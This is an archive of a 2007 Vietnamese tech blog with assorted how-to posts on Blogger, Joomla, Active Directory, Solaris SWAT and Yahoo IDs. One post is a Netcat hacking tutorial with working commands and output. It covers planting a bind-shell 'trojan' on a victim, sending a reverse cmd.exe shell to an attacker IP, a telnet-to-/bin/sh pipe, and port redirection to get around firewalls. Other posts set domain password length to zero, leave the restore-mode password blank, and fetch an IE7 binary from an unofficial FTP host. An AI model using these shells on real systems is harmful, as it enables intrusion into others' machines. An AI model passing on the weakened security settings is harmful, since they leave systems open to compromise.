Monday, October 22, 2007

Chèn biểu tượng feed cho từng nhãn (label)

Mỗi blog có thể có nhiều nhãn, nhưng một số người chỉ quan tâm và có nhu cầu đọc một hoặc một số nhãn nào đó trên blog của bạn qua các chương trình đọc Feed. Làm thế nào để người dùng biết link đến feed cho từng nhãn trên blog của bạn? Hãy đọc bài hướng dẫn sau, bạn sẽ biết cách thực hiện.

Bình thường, nếu không đăng ký FeedBurner và thay đổi Post Feed Redirect URL trong Site Feed (Settings -> Site Feed) liên kết đến Feed cho các bài đăng của blog sẽ có dạng: http://tencuaban.blogspot.com/feeds/posts/default. Từ chương trình đọc feed trên web hay các chương trình trên Windows người dùng có thể đọc một phần hoặc tất cả nội dung của một bài đăng dựa theo chế độ cài đặt của bạn tại Allow Blog Feeds.




Theo hướng dẫn của Blogger link đến Feed cho từng nhãn của bạn sẽ là:

http://tencuaban.blogspot.com/feeds/posts/default/-/labelname

Nhớ phải có dấu "-". Và như vậy có thể dùng link này kết hợp với một hình ảnh, bạn hoàn toàn có một một biểu tượng feed cho từng label.

Cách thực hiện:

- Đăng nhập Blogger và hãy bảo đảm bạn trên blog của bạn có ít nhất một tiện ích label được sử dụng.

- Tiếp theo vào Template -> Edit HTML, nhớ bấm Expand Widget Templates và tìm id='Label1' (hoặc id='Label2' nếu bạn sử dụng đến nhãn thứ 2 )( Có thể dùng Ctrl + F để tìm). Bạn lưu ý đoạn mã sẽ như thế này:


<b:widget id='Label2' locked='false' title='Labels' type='Label'>
<b:includable id='main'>
<b:if cond='data:title'>
<h2>
<data:title/>
</h2>
</b:if>
<div class='widget-content'>
<ul>
<b:loop values='data:labels' var='label'>
<li>
<b:if cond='data:blog.url == data:label.url'>
<data:label.name/>
<b:else/>
<a expr:href='data:label.url'>
<data:label.name/>
</a>
</b:if>
(<data:label.count/>)
</li>
</b:loop>
</ul>

<b:include name='quickedit'/>
</div>
</b:includable>
</b:widget>


Nào bây giờ hãy chép đoạn code:


<a expr:href='data:post.url + "/feeds/posts/default/-/" + data:label.name'><img src='Link đến biểu tượng feed'/></a>


Trong đó Link đến biểu tượng Feed bạn có thể lựa chọn từ một trong các hình sau: (Đưa chuột phải lên hình bạn chọn và click Properties để lấy link)

và dán theo một trong hai cách: phía dưới thẻ <li> (hoặc phía dưới thẻ </li>) để biểu tượng xuất hiện trước (hoặc sau tên của nhãn).

Saturday, October 20, 2007

Sử dụng Internet Explorer 7 không cần cài đặt

Internet Explorer 7 hiện còn là bản thử nghiệm và chỉ có thể cài vào máy sử dụng Windows XP SP2. Tuy nhiên cũng có một cách giúp những ai đang sử dụng Windows XP SP1 thử qua những tính năng hấp dẫn trong phiên bản mới của trình duyệt web quen thuộc này. Đặc biệt cách này - được đề cập trong bài viết sẽ giúp bạn chạy Internet Explorer 7 một cách độc lập với phiên bản cũ vì không cần cài đặt.

Phiên bản Internet Explorer 7 beta 1 đã được Microsoft đưa ra với nhiều tính năng mới rất hấp dẫn cũng như khả năng bảo mật tốt hơn cho người dùng. Dù đây vẫn còn là bản thử nghiệm và chỉ cài được trên các máy sử dụng hệ điều hành Windows XP đã cài sẵn bản Service Pack 2, nhưng nếu bạn đang dùng hệ điều hành Windows XP Service Pack 1 mà muốn xem các tính năng mới của IE 7 như thế nào thì cũng có thể chỉ dùng thử và sẽ không cài đặt nó lên máy tính của mình. Lưu ý là cách này chỉ đúng với các máy sử dụng hệ điều hành Windows XP trở lên.

Đầu tiên bạn download bản IE này tại địa chỉ http://ftp.pconline.com.cn/pub/download/200507/ie7b1.rar về máy tính của mình, dùng Winrar để giải nén (extract) tập tin ie7b1.rar vào một thư mục nào đó, ví dụ C:\Program Files\Internet Explorer 7. Tiếp theo, bạn vào thư mục vừa tạo đó, tìm kiếm một tập tin có tên là SHLWAPI.DLL rồi đổi tên nó thành SHLWAPI.DLL.bak chẳng hạn. Sau đó bạn tạo một một tập tin mới có tên là IEXPLORE.exe.local. Đơn giản nhất là bạn tạo một tập tin Text document bằng cách nhấn chuột phải, chọn New rồi chọn Text Document, sau đó đổi tên tập tin Text document.txt này thành IEXPLORE.exe.local và lưu nó lại (vì tập tin này chỉ dùng để đánh lừa Windows nên bạn không cần để nội dung gì bên trong). Xong bạn chạy tập tin iexplore.exe trong thư mục Internet Explorer 7. Ở lần chạy đầu tiên sẽ xuất hiện một bảng thông báo. Không sao, bạn cứ nhấn OK để tắt nó đi, sau đó bạn trở lại thư mục Internet Explorer 7 và đổi tên tập tin SHLWAPI.DLL.bak thành SHLWAPI.DLL. Bây giờ bạn chạy lại tập tin ieplorer.exe và bạn sẽ sử dụng được Internet Explorer 7 mà không cần cài đặt.

Lưu ý: Với cách này, có thể bạn sẽ không sử dụng được tính năng Favorites của IE 7.

Monday, October 15, 2007

Change Active Directory Strong Password Policies

Windows cannot set the password for because: The password does not meet the password policy requirements. Check the minimum password length, password complexity and password history requirements.

Below are the steps to do so:

  1. Select Domain Security Policy from Administrative Tools.
  2. Expand Security Settings-Account Policies-Password Policy.
  3. Right-click on “Minimum password length” in the right pane and select Properties.
  4. Do not remove the check for the “Define this policy setting” check box.
  5. Enter a new setting - I set mine to 0 (no password required) and click OK.
  6. Right-click on “Password must meet complexity requirements” in the right pane and select Properties.
  7. Do no remove the check for the “Define this policy setting” check box.
  8. Select the Disabled option and click OK.
  9. Close the “Default Domain Security Settings” dialog.
  10. Select Start-Run and type in cmd.
  11. Type “gpupdate /force” (without the quotes) and click Enter.
  12. Type “exit” (without the quotes) to exit Cmd.

Friday, October 12, 2007

Cài Active Directory

1. Log on Exchange1 với quyền Administrator.


2. Click Start à Run sau đó nhập dcpromo vào hộp thoại Run. Click OK để tiếp tục.

3. Click Next hai lần bỏ qua những màn hình mở đầu và để thiết đặt mặc định, Chọn Domain controller for a new domain. Click Next .

4. Chọn Domain in a new forest và click Next.

5. Nhập vietcert.net trong truờng Full DNS name for new domain và Next để tiếp tục.

6. Chấp nhận mặc định tên NetBIOS, VIETCERT, và click Next.

7. Để giá trị mặc định, click Next .

8. Click Next

9. Một đặc tính mới của Server 2003 là chương trình chuẩn đoán DNS (DNS Diagnostic). Chương trình này sẽ xuất hiện nếu DNS không có cài đặt DNS chính xác.DNS không được thiết lập trong Exchange1, như vậy bạn chọn tùy chọn mặc định -Install and configure the DNS server on this computer… Click Next . Thông thường, Tôi khuyến cáo thiết lập DNS theo cách thủ công, nhưng sự cài đặt DNS tự động sẽ làm việc tốt trong bài lab này.

10. Trong môi trường Windows 2000 hoặc Server 2003, nó an toàn và bảo mật hơn cho việc lựa chọn tùy chọn Permissions compatible only with Windows 2000 or Windows Server 2003 operating systems. Chọn sự thiết đặt này và click Next.

11. Restore Mode Administrator để password trống và click Next.

12. Tóm lược và xác minh những sự lựa chọn của bạn, click Next để khởi động quá trình cài đặt Active Directory. Khởi động lại máy, Active Directory đã được thiết đặt.

T.C (Theo VietCERT)

Hướng dẫn tạo nick YM bằng số

Chắc hẳn ai cũng muốn có một nick YM là số điện thoại hay ngày sinh của mình, bài hướng dẫn này sẽ giúp các bạn làm điều đó

Để tạo nick Ym chỉ có số thì bạn cần đến Yahoo Go!, nhưng nó chỉ chạy trên nền Pocket PC mà thôi, do đó đối với những bạn không có PPC thì ta cần vài soft để giả lập PPC trên PC.

*********************************

Các soft cần thiết:

* Microsoft Active Sync 4.5
Link : http://www.microsoft.com/windowsmobi...ivesync45.mspx
Download trực tiếp : Click vào đây


* Microsoft Device Emulator Preview
Link : http://www.microsoft.com/downloads/d...displaylang=en
Download Trực Tiếp : Click vào đây


* Windows Mobile 6 Professional Images
Link : http://www.microsoft.com/downloads/d...displaylang=en

Chọn 0409\Windows Mobile 6 Professional Images (USA).msi 183.1 MB

Download Trực Tiếp : Click vào đây


***********************************

Tiến hành
đầu tiên cài Active Sync sau đó Device Emulator Preview và cuối cùng là Windows Mobile 6 Professional Images
sau khi cài đặt xong thì chạy Active Sync - để kết nối được với PPC giả lập thì cần chỉnh setting như sau: File - Connection Settings trong Allow connections to one of the following chọn DMA như trong hình (sau khi connect)


Start Menu - Windows Mobile 6 SDK - Standalone Emulator Images - US English - chọn cái nào cũng được, tôi thì chọn cho màn hình to nhìn dễ Professional Square QVGA :hoanho:



Start Menu - Windows Mobile 6 SDK - Tools - Device Emulator Manager - sẽ có biểu tượng một cái mobile ở system tray, chuột phải chọn Open - sẽ thấy như hình bên dưới, chuột phải vào dãy ký tự đó chọn Cradle


tiếp đó trong cửa sổ PPC giả lập chọn File - Configure, sẽ hiện ra cửa sổ Emulator Properties, vào tiếp Network và chọn cái đầu tiên (tôi đang dùng laptop nên nó hiện ra vậy, có thể các máy khác nhau sẽ khác nhau)


sau khi hoàn thành các bước trên thì PPC giả lập đã kết nối được với PC, Active Sync thông báo là Connected và PPC giả lập có thể truy cập được Internet

ở PPC giả lập chọn Start sau đó chọn Internet Explorer


gõ vào địa chỉ: vn.get.go.yahoo.com


kéo thanh cuộn ở PPC xuống dưới cùng


click vào >>Get It Now

sẽ ra như sau:


click vào Download Now

sau khi download thì Open nó và setup, sau khi setup xong


Start - Program để chạy Yahoo Go




sau đó chọn country - YM sẽ hỏi bạn đã có YM ID chưa, nhớ chọn No, I don't, sau đó chọn Options - Get Started - tiến hành các bước tạo nick YM bằng số


sau khi xong:


Done.

Để tạo nick khác thì cần phải remove Yahoo Go đi và cài lại thì mới có thể tạo nick khác.

Thursday, October 11, 2007

chèn nhạc vào blog

Âm nhạc sẽ làm cho blog bạn trở nên thú vị với người đọc. Có nhiều cách để đăng nhạc vào blog. Dưới đây là một trong số.

Hãy tham khảo đoạn mã này bạn có thể đăng tệp tin âm thanh cho blog.


<embed src="Liên kết đến file âm thanh" type="audio/mpeg" loop="false" autostart="false" height="40" width="304"></embed>
Liên kết đến tệp tin: Liên kết đến tệp tin có thể qua giao tức mms
Giải thích thêm:

  • Liên kết đến file âm thanh: Là liên kết đến nơi lưu trữ tệp tin âm thanh. Bạn có thể upload một bài hát nào đó lên http://page.google.com bằng tài khoản dùng chung với Blogger.com của bạn hoặc bạn tìm đâu đó link của bài hát. Trên trang media của Tuổi Trẻ có rất nhiều bài hát cho phép bạn download, sử dụng điểm này để lấy link. Cách làm, ngay biểu tượng download của bài hát, click chuột phải chọn Properties, bạn nhớ phần mở rộng của tệp tin âm thanh ở đây là mp3.Ví dụ tôi đã chép link của bài hát Cám ơn em Sài Gòn (Vũ Quốc Việt) như bên dưới:http://222.255.121.179/Media/Music/Download/vqv-01camonemsaigon.mp3
  • type="audio/mpeg": Định dạng của tệp tin.
  • loop="false": Lặp lại, nếu bạn muốn bài hát tự động lặp lại thì thay false bằng true.
  • autostart="false": Tự động chơi tệp tin, nếu bạn muốn bài hát tự động được chơi thì thay false bằng true.
  • height="40": Chiều cao của phần hiển thị, hãy chọn chiều cao phù hợp, đơn vị pixel.
  • width="304": Chiều rộng của phần hiển thị.
Xong, kết quả hiển thị như dưới đây. Hãy bấm play để nghe để nghe bài hát nhé.

Vẫn chưa xong bạn ạ, nếu bạn dùng trình duyệt Firefox, bạn có thể không hiển thị hoặc nghe được bài hát này. Nó yêu cầu cài đặt plug-in cho trình duyệt. Vậy thì làm thế nào để người dùng dù sử dụng trình duyệt nào cũng có thể nghe được bài hát.

Hãy sử dụng đoạn mã này.


<embed showdisplay="0" showstatusbar="1" showcontrols="1" autostart="0" type="application/x-mplayer2" src="Liên kết đến tệp tin" space="0" align="middle" height="69" width="304"></embed>
  • showstatusbar="1": Hiển thị status bên dưới. Nếu không muốn bạn thay 1 bằng 0.
  • showcontrols="1" : Hiển thị điều khiển. Nếu không muốn bạn thay 1 bằng 0.
  • autostart="0": Tự động chơi. Nếu muốn bạn thay 0 bằng 1.
Hãy nghe bài hát lúc nãy, tôi chắc chắn bạn dùng Firefox, không cần cài đặt plug-in, vẫn sử dụng được.
Tương tự như vậy nếu bạn có tệp tin video (.wmv) thì có thể đưa vào đây và tăng kích cở height cũng như width để khung nhìn video rộng hơn.

Đây là chương trình TVO (Tuổi Trẻ Video Online) kỳ 19-07 (liên kết:)
mms://media.tuoitre.com.vn/Stream/tivio/TVO-19-07/TVO-19-07.wmv với height="350" width="400"
Cuối cùng bạn hãy chép đoạn mã này, trên cửa sổ viết bài (Posting | Create), hãy cho hiển thị Edit html thay vì chọn Compose, chèn nó vào bài viết. Hoặc bạn paste vào HTML/Javascript (Template | Add and Arrange Page Elements | Add a Page Element ) nếu bạn chỉ muốn tạo một widget chơi nhạc thôi. Chúc bạn thành công!

Cài đặt bộ gõ tiếng Việt AVIM cho Joomla

Bộ gõ AVIMBộ gõ A.V.I.M - Advanced Vietnamese Input Method (tên gọi cũ là H.I.M) của tác giả Đặng Trần Hiếu được phát triển bằng ngôn ngữ Javascript, có thể dễ dàng tích hợp AVIM vào website, diễn đàn. AVIM có thể hoạt động tốt với IFRAME nên sẽ kết hợp được với các bộ gõ thuộc dạng web-based WYSIWYG (bộ soạn thảo tích hợp trên web, forum, blog...) khác được viết bằng Javascript hay sử dụng công nghệ AJAX.

AVIM là bộ gõ đầu tiên tương thích cùng lúc với trình duyệt FireFox lẫn Internet Explorer vào thời điểm phát hành. Điểm mạnh của AVIM là khả năng tương thích. Cho đến thời điểm hiện tại, phiên bản AVIM 20070613 hoạt động trên khá nhiều trình duyệt như Internet Explorer, FireFox, Safari, Opera, Konqueror... AVIM chạy "ngon lành" trên hầu hết các hệ điều hành Windows, Linux, Solaris, Mac OS... Hiện nay, số lượng website và diễn đàn tại Việt Nam sử dụng AVIM rất phổ biến như HVA, DDTH, HN-AMS, Wikipedia Việt Nam, VN UNITED, JoomlaViet, ITP Students Forums...

Gần đây AVIM còn được phát triển thành module cho FireFox Yahoo Messenger.

Thực hiện cài đặt bộ gõ AVIM:

Bước 1: Download AVIM bản mới nhất

Bước 2: Thiết lập các thông số

Mở file AVIM (VD: AVIM20070613.js) mà bạn vừa download về và sửa các thông số sau (nếu muốn)

method=0 //Cách gõ tiếng Việt, 0=Tự động, 1=TELEX, 2=VNI, 3=VIQR
on_off=1 //1=Bật bộ gõ, 0=Tắt bộ gõ
dockspell=1 //1=Có kiểm tra chính tả, 0=Không kiểm tra chính tả
dauCu=1 //1=Bỏ dấu kiểu cũ (o`a, o`e, u`y)
useCookie=1 //1=Có sử dụng Cookie, 0=Không sử dụng cookie

Bước 3: Upload file AVIM lên Joomla

Upload AVIM lên thư mục Joomla: đặt trực tiếp vào thư mục Joomla

Joomla
------\templates
------\templates\vinaora
------\templates\vinaora\index.php
-----------------------------------
------avim20070613.js
------index.php

Bước 4: Nhúng AVIM vào Website Joomla

Mở file index.php trong thư mục templates\templa_cua_ban. VD:

"Joomla\templates\vinaora\index.php"

Tìm đến trước thẻ và thêm đoạn mã sau

(nhớ thay http://vinaora.com = Website của bạn Cool)

Bước 5: Nhúng AVIM vào phần quản trị

  • Nếu là Joomla 1.5: mở file index.php trong thư mục "administrator\templates\khepri"
  • Nếu là Joomla 1.0.x: mở file index.php trong thư mục "administrator\templates\joomla_admin"

Sau đó làm tương tự như bước 4

Bước 6: Chạy thử

Mở Website của bạn. VD: http://vinaora.com

  • F12: bật/tắt bộ gõ
  • F9: thay đổi kiểu gõ (luân phiên Tự động, Telex, VNI, VIQR)
  • F8: bật/tắt chế độ kiểm tra chính tả.
  • F7: bật/tắt chế độ bỏ dấu theo kiểu cũ ("òa", "ùy"...).

Tham khảo thêm:

Wednesday, October 10, 2007

Configuring the SAMBA Web Administration Tool (SWAT) for Solaris 10

Configuring the SAMBA Web Administration Tool (SWAT) for Solaris 10

SWAT is a web based tool for managing a SAMBA server environment. It provides a GUI to manage the SAMBA configuration files (Global Settings, Shares, Printers etc), gives you simple interface to view SAMBA documentation and allows you to stop and restart the SAMBA processes.

SWAT ships with Solaris 10 in /usr/sfw/sbin and, like the version of SAMBA we ship, is supported by Sun.

The below is correct for Solaris 9 and Solaris 10 up to Solaris 10 Update 3 (11/06). If you are running Solaris 10 Update 4 (8/07) or later you need to look at this blog entry.

Here is how you enable SWAT:

  1. Add the following line to /etc/services:

    swat 901/tcp

  2. Add the following line to /etc/inetd.conf:

    swat stream tcp nowait root /usr/sfw/sbin/swat swat

  3. Run the command inetconv to compile the new information in inetd.conf into Solaris. You should see messages about XML files being created, something like the below:

    root# inetconv
    swat -> /var/svc/manifest/network/swat-tcp.xml
    Importing swat-tcp.xml ...Done

You should now be able to connect to SWAT using a browser, just point your browser at http://servername:901.

If you want to know how to enable SAMBA in Solaris 10 in the first place, check out this blog entry.

Tuesday, October 9, 2007

Hướng dẫn sử dụng Netcat

Hướng dẫn sử dụng Netcat

1. Giới thiệu
Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. Vì vậy bạn cần biết một chút về Netcat
--------------------------------------------------------------------------------

2. Biên dịch
Đối với bản Netcat cho Linux, bạn phải biên dịch nó trước khi sử dụng.

- hiệu chỉnh file netcat.c bằng vi: vi netcat.c
+ tìm dòng res_init(); trong main() và thêm vào trước 2 dấu "/": // res_init();
+ thêm 2 dòng sau vào phần #define (nằm ở đầu file):
#define GAPING_SECURITY_HOLE
#define TELNET
- biên dịch: make linux
- chạy thử: ./nc -h
- nếu bạn muốn chạy Netcat bằng nc thay cho ./nc, bạn chỉ cần hiệu chỉnh lại biến môi trường PATH trong file ~/.bashrc, thêm vào ":."
PATH=/sbin:/usr/sbin:...:.

Bản Netcat cho Win không cần phải compile vì đã có sẵn file nhị phân nc.exe. Chỉ vậy giải nén và chạy là xong.


--------------------------------------------------------------------------------

3. Các tùy chọn của Netcat
Netcat chạy ở chế độ dòng lệnh. Bạn chạy nc -h để biết các tham số:

C:\>nc -h
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, stealth mode

-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]


* Cú pháp:

- chế độ kết nối : nc [-tùy_chọn] tên_máy cổng1[-cổng2]
- chế độ lắng nghe: nc -l -p cổng [-tùy_chọn] [tên_máy] [cổng]

* Một số tùy chọn:

-d tách Netcat khỏi cửa sổ lệnh hay là console, Netcat sẽ chạy ở chế độ steath(không hiển thị trên thanh Taskbar)
-e prog thi hành chương trình prog, thường dùng trong chế độ lắng nghe
-h gọi hướng dẫn
-i secs trì hoãn secs mili giây trước khi gởi một dòng dữ liệu đi
-l đặt Netcat vào chế độ lắng nghe để chờ các kết nối đến
-L buộc Netcat "cố" lắng nghe. Nó sẽ lắng nghe trở lại sau mỗi khi ngắt một kết nối.
-n chỉ dùng địa chỉ IP ở dạng số, chẳng hạn như 192.168.16.7, Netcat sẽ không thẩm vấn DNS
-o file ghi nhật kí vào file
-p port chỉ định cổng port
-r yêu cầu Netcat chọn cổng ngẫu nhiên(random)
-s addr giả mạo địa chỉ IP nguồn là addr
-t không gởi các thông tin phụ đi trong một phiên telnet. Khi bạn telnet đến một telnet daemon(telnetd), telnetd thường yêu cầu trình telnet client của bạn gởi đến các thông tin phụ như biến môi trường TERM, USER. Nếu bạn sử dụng netcat với tùy chọn -t để telnet, netcat sẽ không gởi các thông tin này đến telnetd.
-u dùng UDP(mặc định netcat dùng TCP)
-v hiển thị chi tiết các thông tin về kết nối hiện tại. -vv sẽ hiển thị thông tin chi tiết hơn nữa.
-w secs đặt thời gian timeout cho mỗi kết nối là secs mili giây
-z chế độ zero I/O, thường được sử dụng khi scan port

Netcat hổ trợ phạm vi cho số hiệu cổng. Cú pháp là cổng1-cổng2. Ví dụ: 1-8080 nghĩa là 1,2,3,..,8080


--------------------------------------------------------------------------------

4. Các ví dụ:
4.1 Chộp banner của web server
Ví dụ: nc đến 172.16.84.2, cổng 80

C:\>nc 172.16.84.2 80
HEAD / HTTP/1.0 (tại đây bạn gõ Enter 2 lần)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2000 20:51:37 GMT
Server: Apache-AdvancedExtranetServer/1.3.19 (Linux-Mandrake/3mdk) mod_ssl/2.8.2
OpenSSL/0.9.6 PHP/4.0.4pl1
Connection: close
Content-Type: text/html


Để biết thông tin chi tiết về kết nối, bạn có thể dùng -v(-vv sẽ cho biết các thông tin chi tiết hơn nữa)

C:\>nc -vv 172.16.84.1 80
172.16.84.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [172.16.84.1] 80 (?) open
HEAD / HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 04 Feb 2000 14:46:43 GMT
Server: Apache/1.3.20 (Win32)
Last-Modified: Thu, 03 Feb 2000 20:54:02 GMT
ETag: "0-cec-3899eaea"
Accept-Ranges: bytes
Content-Length: 3308
Connection: close
Content-Type: text/html

sent 17, rcvd 245: NOTSOCK


Nếu muốn ghi nhật kí, hãy dùng -o . Ví dụ:

nc -vv -o nhat_ki.log 172.16.84.2 80


- xem file nhat_ki.log

<> nghĩa là netcat gởi đến server

4.2 Quét cổng
- chạy netcat với tùy chọn -z. Để quét cổng nhanh hơn, hãy dùng -n vì netcat sẽ không cần thấm vấn DNS. Ví dụ để scan các cổng TCP(1->500) của host 172.16.106.1

[dt@vicki /]# nc -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 443 (?) open
(UNKNOWN) [172.16.106.1] 139 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open
(UNKNOWN) [172.16.106.1] 80 (?) open
(UNKNOWN) [172.16.106.1] 23 (?) open


- nếu bạn cần scan các cổng UDP, dùng -u

[dt@vicki /]# nc -u -nvv -z 172.16.106.1 1-500
(UNKNOWN) [172.16.106.1] 1025 (?) open
(UNKNOWN) [172.16.106.1] 1024 (?) open
(UNKNOWN) [172.16.106.1] 138 (?) open
(UNKNOWN) [172.16.106.1] 137 (?) open
(UNKNOWN) [172.16.106.1] 123 (?) open
(UNKNOWN) [172.16.106.1] 111 (?) open


4.3 Biến Netcat thành một trojan
- trên máy tính của nạn nhân, bạn khởi động netcat vào chế độ lắng nghe, dùng tùy chọn -l(listen) và -p port để xác định số hiệu cổng cần lắng nghe, -e để yêu cầu netcat thi hành 1 chương trình khi có 1 kết nối đến, thường là shell lệnh cmd.exe(đối với NT) hoặc /bin/sh(đối với Unix). Ví dụ:

E:\>nc -nvv -l -p 8080 -e cmd.exe
listening on [any] 8080 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3159
sent 0, rcvd 0: unknown socket error


- trên máy tính dùng để tấn công, bạn chỉ việc dùng netcat nối đến máy nạn nhân trên cổng đã định, chẳng hạn như 8080

C:\>nc -nvv 172.16.84.2 8080
(UNKNOWN) [172.16.84.2] 8080 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

E:\>cd test
cd test

E:\test>dir /w
dir /w
Volume in drive E has no label.
Volume Serial Number is B465-452F

Directory of E:\test

[.] [..] head.log NETUSERS.EXE NetView.exe
ntcrash.zip password.txt pwdump.exe
6 File(s) 262,499 bytes
2 Dir(s) 191,488,000 bytes free

C:\test>exit
exit
sent 20, rcvd 450: NOTSOCK


Như bạn thấy, chúng ta đã có thể làm gì mà chẳng được với máy của nạn nhân qua shell lệnh này?! Tuy nhiên, sau kết nối trên, netcat trên máy nạn nhân cũng đóng luôn. Để yêu cầu netcat lắng nghe trở lại sau mỗi kết nối, bạn dùng -L thay cho -l. Lưu ý: -L chỉ có thể áp dụng cho bản Netcat for Windows, không áp dụng cho bản chạy trên Linux.

E:\>nc -nvv -L -p 8080 -e cmd.exe
listening on [any] 8080 ...


- Riêng đối với Netcat cho Win, bạn có thể lắng nghe ngay trên cổng đang lắng nghe. Chỉ cần chỉ định địa chỉ nguồn là -s <địa_chỉ_ip_của_máy_này>. Ví dụ:

netstat -a
...
TCP nan_nhan:domain nan_nhan:0 LISTENING <- cổng 53 đang lắng nghe ... E:\>nc -nvv -L -e cmd.exe -s 172.16.84.1 -p 53 -> lắng nghe ngay trên cổng 53
listening on [172.16.84.1] 53 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.1] 3163


- Trên Windows NT, để đặt Netcat ở chế độ lắng nghe, không cần phải có quyền Administrator, chỉ cần login vào với 1 username bình thường khởi động Netcat là xong.

- Chú ý: bạn không thể chạy netcat với ... -u -e cmd.exe... hoặc ...-u -e /bin/sh... vì netcat sẽ không làm việc đúng. Nếu bạn muốn có một UDP shell trên Unix, hãy dùng udpshell thay cho netcat.


--------------------------------------------------------------------------------

5. Kĩ thuật tiên tiến
5.1 Telnet nghịch chuuyển
- dùng telnet để nối cửa số netcat đang lắng nghe, kế đó đưa lệnh từ cửa sổ này vào luồng telnet nghịch chuyển, và gởi kết quả vào cửa sổ kia. Ví dụ:

- trên máy dùng để tấn công(172.16.84.1), mở 2 cửa sổ netcat lần lượt lắng nghe trên cổng 80 và 25:

+ cửa sổ Netcat (1)

C:\>nc -nvv -l -p 80
listennng on [any] 80 ...
connect to [172.16.84.1] from [172.16.84.2] 1055
pwd
ls -la
_


+ cửa sổ Netcat (2)

C:\>nc -nvv -l -p 25
listening on [any] 25 ...
connect to [172.16.84.1] from (UNKNOWN) [172.16.84.2] 1056
/
total 171
drwxr-xr-x 17 root root 4096 Feb 5 16:15 .
drwxr-xr-x 17 root root 4096 Feb 5 16:15 ..
drwxr-xr-x 2 root root 4096 Feb 5 08:55 b ( ²?n
drwxr-xr-x 3 root root 4096 Feb 5 14:19 boot
drwxr-xr-x 13 root root 106496 Feb 5 14:18 dev
drwxr-xr-x 37 root root 4096 Feb 5 14:23 et = ²?
drwxr-xr-x 6 root root 4096 Feb 5 08:58 home
drwxr-xr-x 6 root root 4096 Feb 5 08:50 l ( ²?b
drwxr-xr-x 2 root root 7168 De = ²? 31 1969 mnt
drwxr-xr-x 4 root root 4096 Feb 5 16:18 n = ²?
drwxr-xr-x 2 root root 4096 Aug 23 12:03 opt
dr-xr-xr-x 61 root root 0 Feb 5 09:18 pro = ²?
drwx------ 12 root root 4096 Feb 5 16:24 root
drwxr-xr-x 2 root root 4096 Feb 5 08:55 sb ( ²?n
drwxrwxrwt 9 root root 4096 Feb 5 16:25 tmp
drwxr-xr-x 13 root root 4096 Feb 5 08:42 usr
drwxr-xr-x 18 root root 4096 Feb 5 08:52 var


- trên máy tính nạn nhân(172.16.84.2), telnet nghịch chuyển đến máy dùng để tấn công(172.16.84.1), dùng /bin/sh để kết xuất:

[root@nan_nhan /]# telnet 172.16.84.1 80 | /bin/sh | telnet 172.16.84.1 25
/bin/sh: Trying: command not found
/bin/sh: Connected: command not found
/bin/sh: Escape: command not found
Trying 172.16.84.1...
Connected to 172.16.84.1.
Escape character is '^]'.
_


Telnet trên máy nạn nhân sẽ chuyển tất cả những gì mà chúng ta gõ vào trong cửa sổ Netcat (1) - cổng 80 kết xuất sang cho /bin/sh thi hành. Kết quả của /bin/sh được kết xuất trở lại cho máy tính dùng để tấn công trên cửa sổ Netcat (2) - cổng 25. Nhiệm vụ của bạn là chỉ cần gõ lệnh vào cửa sổ Netcat (1) và xem kết quả trong cửa sổ Netcat (2).

Sở dĩ tôi chọn cổng 80 và 25 vì các cổng này thường không bị firewalls hoặc filters lọc.

5.2 Tạo kênh sau
Cũng tương tự như telnet nghịch chuyển.

- trên máy tính dùng để tấn công, bạn đặt Netcat lắng nghe trên cổng 80 vì cổng này sẽ không bị firewall chặn:

C:\>nc -nvv -l -p 80
listennng on [any] 80 ...


- tiếp theo, từ shell lệnh của máy nạn nhân, bạn nối Netcat đến máy dùng để tấn công với tùy chọn -e để đổ shell:

E:\>nc -e cmd.exe 172.16.84.1 80


Một khi máy nạn nhân thi hành chuổi lệnh trên, kênh sau nc sẽ được tạo, "nhét" shell (trong trường hợp này là cmd.exe) trở vào nc. Kể từ đây, chúng ta đã có 1 shell lệnh ảo.

C:\>nc -nvv -l -p 80
listenning pm [any] 80 ...
connect to [172.16.84.1] from [UNKNOWN] [172.16.84.3] 1035

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

E:\>


5.3 Đổi hướng cổng
Bạn có thể dùng tunnel.pl hoặc fpipe.exe. Hãy xem ví dụ sau:

- chạy nc trên cổng bất kì:

E:\>nc -nvv -L -p 1234 -e cmd.exe
listening on [any] 1234 ...


- chạy tunnel hoặc fpipe để đổi hướng cổng

C:\>perl tunnel.pl --port=53 --tohost=127.0.0.1 --toport=1234

C:\>fpipe -l 53 -r 1234 127.0.0.1

tunnel, fpipe sẽ lắng nghe trên cổng 53, sau đó chuyển tiếp kết nối đến 127.0.0.1:1024, đây là cổng mà netcat đang lắng nghe.

Đổi hướng cổng là một cách để đi vòng qua firewalls.

Làm gì khi Folder Options, TaskManager, Regedit bị mất

Khi máy tính bị nhiễm một số loại virus hoặc thậm chí sau khi đã diệt sạch virus, bạn không tìm thấy hàng chữ Folder Options trong menu Tools của cửa sổ My Computer (hoặc Windows Explorer), Cũng như hàng chữ Task Manager bị mờ đi trong menu hiện ra khi bấm chuột phải lên thanh taskbar, đồng thời bấm Start > Run, gõ regedit thì không chạy được. Để có lại ba thành phần này, bạn thực hiện các cách sau

Khôi phục Folder Options

